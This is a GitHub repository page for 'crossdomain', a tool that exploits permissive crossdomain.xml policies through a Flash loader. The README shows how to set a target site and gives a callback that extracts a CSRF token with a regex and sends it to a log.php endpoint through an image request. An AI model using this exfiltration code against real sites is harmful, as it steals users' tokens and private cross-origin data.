crossdomain

Crossdomain exploiting - exploiting insecure crossdomain.xml files.

How to use this?

In crossdomain.js, edit the following line:

crossdomain.setTarget('http://www.olivierbeg.nl/');

How do I handle the data?

In crossdomain.js there is a callback function, this function receives all the content sent through the flash file that loads the data from the remote website. To exploit it further you can change the crossdomain.callback function to handle the data.

######As preview:

'callback': function (data) {
  console.log(data);
}

Can become something like:

'callback': function (data) {
  var response = data.match('csrf value=(.*)>');
  if(response != null) {
    var img = document.createElement('img');
    img.src = 'log.php?response=' + escape(JSON.parse(response));
    
    document.getElementById('dump').appendChild(img);
  }
}

Name		Name	Last commit message	Last commit date
Latest commit History 21 Commits
public		public
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

public

public

README.md

README.md

Repository files navigation

crossdomain

How to use this?

How do I handle the data?

About

Releases

Packages

Languages

SymbianSyMoh/crossdomain

Folders and files

Latest commit

History

public

public

README.md

README.md

Repository files navigation

crossdomain

How to use this?

How do I handle the data?

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages